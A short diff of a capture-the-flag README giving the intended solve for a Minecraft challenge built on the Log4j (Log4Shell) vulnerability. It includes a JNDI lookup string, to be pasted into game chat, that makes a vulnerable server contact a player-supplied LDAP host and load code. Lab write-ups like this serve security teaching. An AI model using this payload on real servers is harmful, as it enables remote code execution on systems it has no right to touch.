zinkozapper/CTF/mclog4j/README.md

 ## Writeup
 The intended solve for this challenge is for you to do some research to find (ie by searching `minecraft logging vuln`) to find out this challenge uses the Log4J vulnerability.
 You then must write your own payload and find a way to execute it.

-Write your exploit and upload it to the web portal
+Write your exploit and upload it to the web portal.

 Paste this string in the minecraft chat: `${jndi:ldap://{the ip your container gave you}:1389/a}`